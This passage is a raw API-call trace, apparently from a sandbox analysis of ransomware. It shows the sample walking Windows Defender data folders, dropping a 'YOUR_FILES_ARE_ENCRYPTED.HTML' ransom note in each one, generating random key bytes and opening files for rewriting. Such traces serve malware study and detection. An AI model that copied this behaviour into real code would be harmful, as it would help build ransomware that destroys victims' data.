nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.702] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0107.702] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0107.702] GetProcessHeap () returned 0x600000 [0107.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.703] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.703] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.704] CloseHandle (hObject=0x32c) returned 1 [0107.704] GetProcessHeap () returned 0x600000 [0107.704] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.704] GetProcessHeap () returned 0x600000 [0107.704] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.705] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Service", cAlternateFileName="")) returned 1 [0107.705] StrStrIW (lpFirst="Service", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.705] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 67 [0107.705] GetProcessHeap () returned 0x600000 [0107.705] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.706] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0107.706] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0107.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.706] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.706] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x48, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="Unknown.Log", cAlternateFileName="")) returned 1 [0107.706] StrStrIW (lpFirst="Unknown.Log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.706] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0107.706] PathFindExtensionW (pszPath="Unknown.Log") returned=".Log" [0107.706] lstrlenW (lpString=".Log") returned 4 [0107.707] PathFindExtensionW (pszPath="Unknown.Log") returned=".Log" [0107.707] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x48, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="Unknown.Log", cAlternateFileName="")) returned 0 [0107.707] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.707] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0107.707] GetProcessHeap () returned 0x600000 [0107.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.707] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.708] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.709] CloseHandle (hObject=0x32c) returned 1 [0107.709] GetProcessHeap () returned 0x600000 [0107.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.709] GetProcessHeap () returned 0x600000 [0107.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.710] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Store", cAlternateFileName="")) returned 1 [0107.710] StrStrIW (lpFirst="Store", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.710] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 65 [0107.710] GetProcessHeap () returned 0x600000 [0107.710] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.711] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0107.711] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*" [0107.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0107.712] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.712] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.712] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0107.712] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0107.712] GetProcessHeap () returned 0x600000 [0107.712] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.712] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\store\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.712] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.714] CloseHandle (hObject=0x32c) returned 1 [0107.715] GetProcessHeap () returned 0x600000 [0107.715] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.715] GetProcessHeap () returned 0x600000 [0107.715] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.715] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Store", cAlternateFileName="")) returned 0 [0107.715] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.716] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0107.716] GetProcessHeap () returned 0x600000 [0107.716] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.716] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.716] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.718] CloseHandle (hObject=0x314) returned 1 [0107.719] GetProcessHeap () returned 0x600000 [0107.719] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.719] GetProcessHeap () returned 0x600000 [0107.719] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.720] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MetaStore", cAlternateFileName="METAST~1")) returned 1 [0107.720] StrStrIW (lpFirst="MetaStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.720] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore") returned 61 [0107.720] GetProcessHeap () returned 0x600000 [0107.720] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.721] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore" [0107.721] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*" [0107.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.721] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="..", cAlternateFileName="")) returned 1 [0107.721] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="1", cAlternateFileName="")) returned 1 [0107.721] StrStrIW (lpFirst="1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.721] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1") returned 63 [0107.721] GetProcessHeap () returned 0x600000 [0107.721] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.722] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1" [0107.722] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*" [0107.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.722] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.723] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0107.723] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.723] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\0000000000000000.idx") returned 84 [0107.723] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.723] lstrlenW (lpString=".idx") returned 4 [0107.723] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.723] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0107.723] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\0000000000000000.idx" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\1\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0107.723] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0107.723] CloseHandle (hObject=0x310) returned 1 [0107.723] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 0 [0107.724] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.724] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.724] GetProcessHeap () returned 0x600000 [0107.724] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.724] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.724] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.725] CloseHandle (hObject=0x32c) returned 1 [0107.726] GetProcessHeap () returned 0x600000 [0107.726] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.726] GetProcessHeap () returned 0x600000 [0107.726] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.727] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="2", cAlternateFileName="")) returned 1 [0107.727] StrStrIW (lpFirst="2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.727] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2") returned 63 [0107.727] GetProcessHeap () returned 0x600000 [0107.727] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.728] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2" [0107.728] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*" [0107.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.729] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, 